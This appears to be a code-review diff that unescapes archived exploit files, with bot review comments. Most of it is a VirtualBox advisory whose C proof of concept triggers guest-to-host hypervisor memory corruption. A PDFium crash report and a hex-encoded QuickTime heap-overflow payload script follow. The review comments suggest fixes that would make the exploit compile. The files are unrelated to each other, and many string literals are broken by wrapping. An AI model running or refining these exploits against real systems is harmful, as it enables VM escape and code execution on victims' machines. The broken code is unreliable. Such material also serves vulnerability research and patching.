VirtualBox provides -among many other features- 3D Acceleration for
|
||||
guest machines
|
||||
through its Guest Additions. This feature allows guest machines to use
|
||||
the host machine\'s
|
||||
the host machine's
|
||||
GPU to render 3D graphics based on then OpenGL or Direct3D APIs.
|
||||
|
||||
Multiple memory corruption vulnerabilities have been found in the code
|
||||
|
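Review bot: the context line `GPU to render 3D graphics based on then OpenGL or Direct3D APIs.` has a typo (`then` should be `the`); since this hunk already touches the paragraph, it is a good place to fix it.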
@ -95,13 +95,13 @@ corruption vulnerabilities, as described below.
|
|||
|
||||
[CVE-2014-0981] The first vulnerability is caused by a *design flaw* in
|
||||
Chromium. The Chromium server makes use
|
||||
of \"*network pointers*\". As defined in Chromium\'s documentation,
|
||||
\'\"Network pointers are
|
||||
of "*network pointers*". As defined in Chromium's documentation,
|
||||
'"Network pointers are
|
||||
simply memory addresses that reside on another machine.[...] The
|
||||
networking layer will then
|
||||
take care of writing the payload data to the specified address.\"\'[2]
|
||||
take care of writing the payload data to the specified address."'[2]
|
||||
|
||||
So the Chromium\'s server code, which runs in the context of the
|
||||
So the Chromium's server code, which runs in the context of the
|
||||
VirtualBox hypervisor
|
||||
in the Host OS, provides a write-what-where memory corruption primitive
|
||||
*by design*, which
|
||||
|
@ -110,9 +110,9 @@ data in the hypervisor process
|
|||
from within a virtual machine.
|
||||
|
||||
This is the code of the vulnerable function [file
|
||||
\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can
|
||||
be reached by sending a \'CR_MESSAGE_READBACK\' message to the
|
||||
\'VBoxSharedCrOpenGL\' service:
|
||||
'src/VBox/GuestHost/OpenGL/util/net.c'], which can
|
||||
be reached by sending a 'CR_MESSAGE_READBACK' message to the
|
||||
'VBoxSharedCrOpenGL' service:
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -139,12 +139,12 @@ crNetRecvReadback( CRMessageReadback *rb, unsigned int len )
|
|||
|
||||
-----/
|
||||
|
||||
Note that \'rb\' points to a \'CRMessageReadback\' structure, which is fully
|
||||
Note that 'rb' points to a 'CRMessageReadback' structure, which is fully
|
||||
controlled by the
|
||||
application running inside a VM that is sending OpenGL rendering
|
||||
commands to the Host side.
|
||||
The \'len\' parameter is also fully controlled from the Guest side, so
|
||||
it\'s possible to:
|
||||
The 'len' parameter is also fully controlled from the Guest side, so
|
||||
it's possible to:
|
||||
|
||||
1. decrement the value stored at any memory address within the
|
||||
address space of the hypervisor.
|
||||
|
@ -154,13 +154,13 @@ the hypervisor.
|
|||
7.2. *VirtualBox crNetRecvWriteback Memory Corruption Vulnerability*
|
||||
|
||||
[CVE-2014-0982] The second vulnerability is closely related to the first
|
||||
one, and it\'s also caused by Chromium\'s
|
||||
\"*network pointers*\".
|
||||
one, and it's also caused by Chromium's
|
||||
"*network pointers*".
|
||||
|
||||
This is the code of the vulnerable function [file
|
||||
\'src/VBox/GuestHost/OpenGL/util/net.c\'], which can
|
||||
be reached by sending a \'CR_MESSAGE_WRITEBACK\' message to the
|
||||
\'VBoxSharedCrOpenGL\' service:
|
||||
'src/VBox/GuestHost/OpenGL/util/net.c'], which can
|
||||
be reached by sending a 'CR_MESSAGE_WRITEBACK' message to the
|
||||
'VBoxSharedCrOpenGL' service:
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -178,10 +178,10 @@ crNetRecvWriteback( CRMessageWriteback *wb )
|
|||
|
||||
-----/
|
||||
|
||||
Note that \'rb\' points to a \'CRMessageWriteback\' structure, which is
|
||||
Note that 'rb' points to a 'CRMessageWriteback' structure, which is
|
||||
fully controlled by the
|
||||
application running inside a VM that is sending OpenGL rendering
|
||||
commands to the Host side, so it\'s possible to
|
||||
commands to the Host side, so it's possible to
|
||||
decrement the value stored at any memory address within the address
|
||||
space of the hypervisor.
|
||||
|
||||
|
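Review bot: `Note that 'rb' points to a 'CRMessageWriteback' structure` names the wrong parameter: the function in this hunk's header is `crNetRecvWriteback( CRMessageWriteback *wb )`, so the text should say `'wb'`; `'rb'` is the parameter of `crNetRecvReadback` in the previous section. Only the quotes were changed here, so the copy-paste error survives the edit.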
@ -192,11 +192,11 @@ Vulnerability*
|
|||
[CVE-2014-0983] When an OpenGL application running inside a VM sends
|
||||
rendering commands (in the form of opcodes + data for those opcodes)
|
||||
through
|
||||
a \'CR_MESSAGE_OPCODES\' message, the Chromium server will handle them in
|
||||
the \'crUnpack\' function.
|
||||
The code for the \'crUnpack\' function is automatically generated by the
|
||||
a 'CR_MESSAGE_OPCODES' message, the Chromium server will handle them in
|
||||
the 'crUnpack' function.
|
||||
The code for the 'crUnpack' function is automatically generated by the
|
||||
Python script located
|
||||
at \'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py\'.
|
||||
at 'src/VBox/HostServices/SharedOpenGL/unpacker/unpack.py'.
|
||||
|
||||
This function is basically a big switch statement dispatching different
|
||||
functions according to the opcode being processed:
|
||||
|
@ -212,7 +212,7 @@ void crUnpack( const void *data, const void *opcodes,
|
|||
|
||||
for (i = 0 ; i < num_opcodes ; i++)
|
||||
{
|
||||
/*crDebug(\"Unpacking opcode \\%d\", *unpack_opcodes);*/
|
||||
/*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/
|
||||
switch( *unpack_opcodes )
|
||||
{
|
||||
case CR_ALPHAFUNC_OPCODE: crUnpackAlphaFunc(); break;
|
||||
|
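Review bot: in `/*crDebug("Unpacking opcode \%d", *unpack_opcodes);*/` the de-escaping pass left `\%d` with a stray backslash (it was `\\%d` before); it sits inside a comment, so it is harmless, but it is inconsistent with the rest of the change and would be an invalid escape if the line were ever uncommented.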
@ -222,9 +222,9 @@ void crUnpack( const void *data, const void *opcodes,
|
|||
|
||||
-----/
|
||||
|
||||
When the opcode being processed is \'CR_VERTEXATTRIB4NUBARB_OPCODE\'
|
||||
(\'0xEA\'),
|
||||
the function to be invoked is \'crUnpackVertexAttrib4NubARB\':
|
||||
When the opcode being processed is 'CR_VERTEXATTRIB4NUBARB_OPCODE'
|
||||
('0xEA'),
|
||||
the function to be invoked is 'crUnpackVertexAttrib4NubARB':
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -235,9 +235,9 @@ break;
|
|||
|
||||
-----/
|
||||
|
||||
The \'crUnpackVertexAttrib4NubARB\' function reads 5 values from the
|
||||
The 'crUnpackVertexAttrib4NubARB' function reads 5 values from the
|
||||
opcode data sent by the Chromium client,
|
||||
and just invokes \'cr_unpackDispatch.VertexAttrib4NubARB\' with those 5
|
||||
and just invokes 'cr_unpackDispatch.VertexAttrib4NubARB' with those 5
|
||||
values as arguments:
|
||||
|
||||
|
||||
|
@ -255,11 +255,11 @@ static void crUnpackVertexAttrib4NubARB(void)
|
|||
|
||||
-----/
|
||||
|
||||
\'VertexAttrib4NubARB\' is a function pointer in a dispatch table, and
|
||||
'VertexAttrib4NubARB' is a function pointer in a dispatch table, and
|
||||
points to the function
|
||||
\'crServerDispatchVertexAttrib4NubARB\', whose code is generated by the
|
||||
'crServerDispatchVertexAttrib4NubARB', whose code is generated by the
|
||||
Python script located at
|
||||
\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\':
|
||||
'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py':
|
||||
|
||||
|
||||
/-----
|
||||
|
@ -273,11 +273,11 @@ z, w );
|
|||
|
||||
-----/
|
||||
|
||||
Note that the \'index\' parameter, which is a 4-byte integer coming from
|
||||
Note that the 'index' parameter, which is a 4-byte integer coming from
|
||||
an untrusted source (the opcode data
|
||||
sent by the Chromium client from the VM), is used as an index within the
|
||||
\'cr_server.current.c.vertexAttrib.ub4\'
|
||||
array in order to write \'cr_unpackData\' (which is a pointer to the
|
||||
'cr_server.current.c.vertexAttrib.ub4'
|
||||
array in order to write 'cr_unpackData' (which is a pointer to the
|
||||
attacker-controlled opcode data), without
|
||||
validating that the index is within the bounds of the array.
|
||||
This issue can be leveraged to corrupt arbitrary memory with a pointer
|
||||
|
@ -285,7 +285,7 @@ to attacker-controlled data.
|
|||
|
||||
Also note that *the same vulnerability affects several functions* whose
|
||||
code is generated by the
|
||||
\'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py\'
|
||||
'src/VBox/HostServices/SharedOpenGL/crserverlib/server_dispatch.py'
|
||||
Python script:
|
||||
|
||||
|
||||
|
@ -324,15 +324,15 @@ crServerDispatchVertexAttrib4sARB
|
|||
|
||||
|
||||
/-----
|
||||
#include \"stdafx.h\"
|
||||
#include "stdafx.h"
|
||||
#include <windows.h>
|
||||
#include \"vboxguest2.h\"
|
||||
#include \"vboxguest.h\"
|
||||
#include \"err.h\"
|
||||
#include \"vboxcropenglsvc.h\"
|
||||
#include \"cr_protocol.h\"
|
||||
#include "vboxguest2.h"
|
||||
#include "vboxguest.h"
|
||||
#include "err.h"
|
||||
#include "vboxcropenglsvc.h"
|
||||
#include "cr_protocol.h"
|
||||
|
||||
#define VBOXGUEST_DEVICE_NAME \"\\\\\\\\.\\\\VBoxGuest\"
|
||||
#define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest"
|
||||
|
||||
|
||||
HANDLE open_device(){
|
||||
|
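Review bot: the new `#define VBOXGUEST_DEVICE_NAME "\\\\.\\VBoxGuest"` is the correct C spelling of the `\\.\VBoxGuest` device path (each backslash doubled inside the literal), whereas the old `\"\\\\\\\\.\\\\VBoxGuest\"` was neither a valid string literal nor the intended path; likewise the `#include \"stdafx.h\"` style lines could never have compiled and only the unescaped `#include "stdafx.h"` form is valid. Since one remaining `\"` anywhere in the file keeps the whole PoC from compiling, a quick grep of the rest of this file for `\"` after the change would be a cheap sanity check.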
@ -345,10 +345,10 @@ HANDLE open_device(){
|
|||
NULL);
|
||||
|
||||
if (hDevice == INVALID_HANDLE_VALUE){
|
||||
printf(\"[-] Could not open device %s .\\n\", VBOXGUEST_DEVICE_NAME);
|
||||
printf("[-] Could not open device %s .\n", VBOXGUEST_DEVICE_NAME);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
printf(\"[+] Handle to %s: 0x%X\\n\", VBOXGUEST_DEVICE_NAME, hDevice);
|
||||
printf("[+] Handle to %s: 0x%X\n", VBOXGUEST_DEVICE_NAME, hDevice);
|
||||
return hDevice;
|
||||
|
||||
|
||||
|
@ -362,24 +362,24 @@ uint32_t do_connect(HANDLE hDevice){
|
|||
|
||||
memset(&info, 0, sizeof(info));
|
||||
info.Loc.type = VMMDevHGCMLoc_LocalHost_Existing;
|
||||
strcpy(info.Loc.u.host.achName, \"VBoxSharedCrOpenGL\");
|
||||
strcpy(info.Loc.u.host.achName, "VBoxSharedCrOpenGL");
|
||||
|
||||
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_CONNECT, &info,
|
||||
sizeof(info), &info, sizeof(info), &cbReturned, NULL);
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function do_connect()!
|
||||
LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function do_connect()!
|
||||
LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (info.result == VINF_SUCCESS){
|
||||
printf(\"HGCM connect was successful: client id =0x%x\\n\",
|
||||
printf("HGCM connect was successful: client id =0x%x\n",
|
||||
info.u32ClientID);
|
||||
}
|
||||
else{
|
||||
//If 3D Acceleration is disabled, info.result value will be -2900.
|
||||
printf(\"[-] HGCM connect failed. Result: %d (Is 3D Acceleration
|
||||
enabled??)\\n\", info.result);
|
||||
printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration
|
||||
enabled??)\n", info.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
return info.u32ClientID;
|
||||
|
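Review bot: after the quoting fix the format string in `printf("ERROR: DeviceIoControl failed in function do_connect()!` / `LastError: %d\n", GetLastError());` still spans two physical lines, and a C string literal cannot contain an unescaped newline, so this line is a hard compile error as stored; the same wrapping affects `printf("[-] HGCM connect failed. Result: %d (Is 3D Acceleration` / `enabled??)\n", info.result);` and recurs in the `do_disconnect`, `set_version`, `set_pid`, `trigger_*` and `main` hunks below. This commit only corrects the quotes, so the file remains non-compilable; either rejoin the wrapped literals or document that the archived text is wrapped at the advisory's column width.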
@ -393,20 +393,20 @@ void do_disconnect(HANDLE hDevice, uint32_t u32ClientID){
|
|||
|
||||
memset(&info, 0, sizeof(info));
|
||||
info.u32ClientID = u32ClientID;
|
||||
printf(\"Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\\n\");
|
||||
printf("Sending VBOXGUEST_IOCTL_HGCM_DISCONNECT message...\n");
|
||||
rc = DeviceIoControl(hDevice, VBOXGUEST_IOCTL_HGCM_DISCONNECT,
|
||||
&info, sizeof(info), &info, sizeof(info), &cbReturned, NULL);
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
do_disconnect()! LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
do_disconnect()! LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (info.result == VINF_SUCCESS){
|
||||
printf(\"HGCM disconnect was successful.\\n\");
|
||||
printf("HGCM disconnect was successful.\n");
|
||||
}
|
||||
else{
|
||||
printf(\"[-] HGCM disconnect failed. Result: %d\\n\", info.result);
|
||||
printf("[-] HGCM disconnect failed. Result: %d\n", info.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -433,16 +433,16 @@ void set_version(HANDLE hDevice, uint32_t u32ClientID){
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function set_version()!
|
||||
LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function set_version()!
|
||||
LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"Host didn\'t accept our version.\\n\");
|
||||
printf("Host didn't accept our version.\n");
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
@ -466,16 +466,16 @@ void set_pid(HANDLE hDevice, uint32_t u32ClientID){
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function set_pid()!
|
||||
LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function set_pid()!
|
||||
LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"Host didn\'t like our PID %d\\n\", GetCurrentProcessId());
|
||||
printf("Host didn't like our PID %d\n", GetCurrentProcessId());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -501,7 +501,7 @@ void trigger_message_readback(HANDLE hDevice, uint32_t u32ClientID){
|
|||
*((DWORD *)&msg.readback_ptr.ptrSize) = 0x99999999;
|
||||
|
||||
memcpy(&mybuf, &msg, sizeof(msg));
|
||||
strcpy(mybuf + sizeof(msg), \"Hi hypervisor!\");
|
||||
strcpy(mybuf + sizeof(msg), "Hi hypervisor!");
|
||||
|
||||
memset(&parms, 0, sizeof(parms));
|
||||
parms.hdr.result = VERR_WRONG_ORDER;
|
||||
|
@ -521,16 +521,16 @@ memcpy: sizeof(mybuf) - 0x18
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
trigger_message_readback()!. LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
trigger_message_readback()!. LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
|
||||
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
}
|
||||
|
@ -553,7 +553,7 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){
|
|||
*((DWORD *)msg.writeback.writeback_ptr.ptrSize) = 0xAABBCCDD;
|
||||
|
||||
memcpy(&mybuf, &msg, sizeof(msg));
|
||||
strcpy(mybuf + sizeof(msg), \"dummy\");
|
||||
strcpy(mybuf + sizeof(msg), "dummy");
|
||||
|
||||
memset(&parms, 0, sizeof(parms));
|
||||
parms.hdr.result = VERR_WRONG_ORDER;
|
||||
|
@ -573,16 +573,16 @@ void trigger_message_writeback(HANDLE hDevice, uint32_t u32ClientID){
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
trigger_message_writeback()! LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
trigger_message_writeback()! LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
|
||||
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -646,16 +646,16 @@ negative index used to trigger the memory corruption
|
|||
sizeof(parms), &parms, sizeof(parms), &cbReturned, NULL);
|
||||
|
||||
if (!rc){
|
||||
printf(\"ERROR: DeviceIoControl failed in function
|
||||
trigger_opcode_0xea()! LastError: %d\\n\", GetLastError());
|
||||
printf("ERROR: DeviceIoControl failed in function
|
||||
trigger_opcode_0xea()! LastError: %d\n", GetLastError());
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
if (parms.hdr.result == VINF_SUCCESS){
|
||||
printf(\"HGCM Call successful. cbReturned: 0x%X.\\n\", cbReturned);
|
||||
printf("HGCM Call successful. cbReturned: 0x%X.\n", cbReturned);
|
||||
}
|
||||
else{
|
||||
printf(\"HGCM Call failed. Result: %d\\n\", parms.hdr.result);
|
||||
printf("HGCM Call failed. Result: %d\n", parms.hdr.result);
|
||||
exit(EXIT_FAILURE);
|
||||
}
|
||||
|
||||
|
@ -676,19 +676,19 @@ void poc(int option){
|
|||
|
||||
switch (option){
|
||||
case 1:
|
||||
printf(\"[1] triggering the first bug...\\n\");
|
||||
printf("[1] triggering the first bug...\n");
|
||||
trigger_message_readback(hDevice, u32ClientID);
|
||||
break;
|
||||
case 2:
|
||||
printf(\"[2] triggering the second bug...\\n\");
|
||||
printf("[2] triggering the second bug...\n");
|
||||
trigger_message_writeback(hDevice, u32ClientID);
|
||||
break;
|
||||
case 3:
|
||||
printf(\"[3] triggering the third bug...\\n\");
|
||||
printf("[3] triggering the third bug...\n");
|
||||
trigger_opcode_0xea(hDevice, u32ClientID);
|
||||
break;
|
||||
default:
|
||||
printf(\"[!] Unknown option %d.\\n\", option);
|
||||
printf("[!] Unknown option %d.\n", option);
|
||||
}
|
||||
|
||||
/* Disconnect from the VBoxSharedCrOpenGL service */
|
||||
|
@ -702,13 +702,13 @@ void poc(int option){
|
|||
int main(int argc, char* argv[])
|
||||
{
|
||||
if (argc < 2){
|
||||
printf(\"Usage: %s <option number>\\n\\n\", argv[0]);
|
||||
printf(\"* Option 1: trigger the vulnerability in the
|
||||
crNetRecvReadback function.\\n\");
|
||||
printf(\"* Option 2: trigger the vulnerability in the
|
||||
crNetRecvWriteback function.\\n\");
|
||||
printf(\"* Option 3: trigger the vulnerability in the
|
||||
crServerDispatchVertexAttrib4NubARB function.\\n\");
|
||||
printf("Usage: %s <option number>\n\n", argv[0]);
|
||||
printf("* Option 1: trigger the vulnerability in the
|
||||
crNetRecvReadback function.\n");
|
||||
printf("* Option 2: trigger the vulnerability in the
|
||||
crNetRecvWriteback function.\n");
|
||||
printf("* Option 3: trigger the vulnerability in the
|
||||
crServerDispatchVertexAttrib4NubARB function.\n");
|
||||
exit(1);
|
||||
}
|
||||
poc(atoi(argv[1]));
|
||||
|
@ -816,8 +816,8 @@ effectively secure their organizations.
|
|||
|
||||
|
||||
|
||||
Core Security\'s software solutions build on over a decade of trusted
|
||||
research and leading-edge threat expertise from the company\'s Security
|
||||
Core Security's software solutions build on over a decade of trusted
|
||||
research and leading-edge threat expertise from the company's Security
|
||||
Consulting Services, CoreLabs and Engineering groups. Core Security
|
||||
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
|
||||
http://www.coresecurity.com.
|
||||
|
|
|
@ -33,8 +33,8 @@ Address 0x7ffc8b7edb84 is located in stack of thread T0 at offset 36 in frame
|
|||
#0 0xd6e2af in CPDF_StitchFunc::v_Call(float*, float*) const core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:795
|
||||
|
||||
This frame has 2 object(s):
|
||||
[32, 36) \'input\' <== Memory access at offset 36 overflows this variable
|
||||
[48, 52) \'nresults\'
|
||||
[32, 36) 'input' <== Memory access at offset 36 overflows this variable
|
||||
[48, 52) 'nresults'
|
||||
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
|
||||
(longjmp and C++ exceptions *are* supported)
|
||||
SUMMARY: AddressSanitizer: stack-buffer-overflow core/src/fpdfapi/fpdf_page/fpdf_page_func.cpp:896:9 in CPDF_Function::Call(float*, int, float*, int&) const
|
||||
|
@ -74,7 +74,7 @@ Shadow byte legend (one shadow byte represents 8 application bytes):
|
|||
==22207==ABORTING
|
||||
--- cut ---
|
||||
|
||||
While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds \"write\" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
|
||||
While the sample crashes on a memory read operation in AddressSanitizer, an out-of-bounds "write" takes place subsequently in the same method, leading to a stack-based buffer overflow condition.
|
||||
|
||||
The crash was reported at https://code.google.com/p/chromium/issues/detail?id=551460. Attached is the PDF file which triggers the crash.
|
||||
|
||||
|
|
|
@ -3,35 +3,35 @@
|
|||
# Vendor: http://www.apple.com/
|
||||
# Risk : high
|
||||
#
|
||||
# The \"<? quicktime type= ?>\" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
|
||||
# The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
|
||||
# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
|
||||
# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
|
||||
# remote crash on firefox, IE and any browser using the Quicktime plugin.
|
||||
# Code execution may be possible.
|
||||
my $payload =
|
||||
\"\\x3c\\x3f\\x78\\x6d\\x6c\\x20\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x3d\\x22\\x31\\x2e\\x30\\x22\\x3f\".
|
||||
\"\\x3e\\x0d\\x0a\\x3c\\x3f\\x71\\x75\\x69\\x63\\x6b\\x74\\x69\\x6d\\x65\\x20\\x74\\x79\\x70\\x65\\x3d\".
|
||||
\"\\x22\\x61\\x70\\x70\\x6c\\x69\\x63\\x61\\x74\\x69\\x6f\\x6e\\x2f\\x78\\x2d\\x71\\x75\\x69\\x63\\x6b\".
|
||||
\"\\x74\\x69\\x6d\\x65\\x2d\\x6d\\x65\\x64\\x69\\x61\\x2d\\x6c\\x69\\x6e\\x6b\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\".
|
||||
\"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x22\\x3f\\x3e\".
|
||||
\"\\x0d\\x0a\\x3c\\x65\\x6d\\x62\\x65\\x64\\x20\\x73\\x72\\x63\\x3d\\x22\\x72\\x74\\x73\\x70\\x3a\\x2f\".
|
||||
\"\\x2f\\x6e\\x6f\\x73\\x69\\x74\\x65\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x6f\\x76\\x69\\x64\\x7a\\x2e\\x6d\".
|
||||
\"\\x6f\\x76\\x22\\x20\\x61\\x75\\x74\\x6f\\x70\\x6c\\x61\\x79\\x3d\\x22\\x77\\x68\\x61\\x74\\x65\\x76\".
|
||||
\"\\x65\\x72\\x22\\x20\\x2f\\x3e\\x00\";
|
||||
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f".
|
||||
"\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d".
|
||||
"\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b".
|
||||
"\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
|
||||
"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e".
|
||||
"\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f".
|
||||
"\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d".
|
||||
